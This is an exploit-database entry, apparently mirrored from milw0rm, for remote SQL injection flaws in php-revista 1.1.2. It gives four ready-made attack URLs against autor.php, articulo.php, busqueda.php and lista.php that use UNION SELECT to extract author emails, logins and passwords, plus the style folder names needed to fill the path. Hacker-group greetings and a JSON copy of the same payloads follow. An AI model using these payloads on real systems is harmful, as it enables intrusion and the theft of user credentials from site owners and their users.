Search...

php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities

2007-03-21T00:00:00

ID EDB-ID:3538
Type exploitdb
Reporter Cold Zero
Modified 2007-03-21T00:00:00

Description

php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for php platform

                                        
                                            php-revista &lt;= 1.1.2  Remote SQL Injection Exploit

Found by & contact : Cold z3ro , cold-z3ro@hotmail.com

script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0


Exploits :
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================

Styles names :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/
==========================================================================================================================================
----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 " alz3eem" | | The_Viper |Kof2002|
             All i know
==========================================================================================================================================


Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

Print :  Team Hell

# milw0rm.com [2007-03-21]

JSON Vulners Source

Initial Source

{"published": "2007-03-21T00:00:00", "id": "EDB-ID:3538", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "67116bb1e473f26f8ec8960ca0467c0d4b0eb163a4a6bdfa2f38ec5659534ac4", "description": "php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/3538/", "lastseen": "2016-01-31T18:43:26", "edition": 1, "title": "php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities", "osvdbidlist": [], "modified": "2007-03-21T00:00:00", "bulletinFamily": "exploit", "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/3538/", "references": [], "reporter": "Cold Zero", "sourceData": "php-revista <= 1.1.2 Remote SQL Injection Exploit\n\nFound by & contact : Cold z3ro , cold-z3ro@hotmail.com\n\nscript :\nhttp://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0\n\n\nExploits :\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from\nautores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\n\nStyles names :\n/discreet/\n/galveston/\n/mergedidea/\n/Widget_Factory/\n/Digital_Multiplex/\n==========================================================================================================================================\n---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|\n |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|\n |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|\n |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 \" alz3eem\" | | The_Viper |Kof2002|\n All i know\n==========================================================================================================================================\n\n\nBig Thx For : www.4azhar.com , Viva My HomeLand Palestine\n\nPrint : Team Hell\n\n# milw0rm.com [2007-03-21]\n", "objectVersion": "1.0"}

php-revista &lt;= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities

Description

php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for php platform

php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities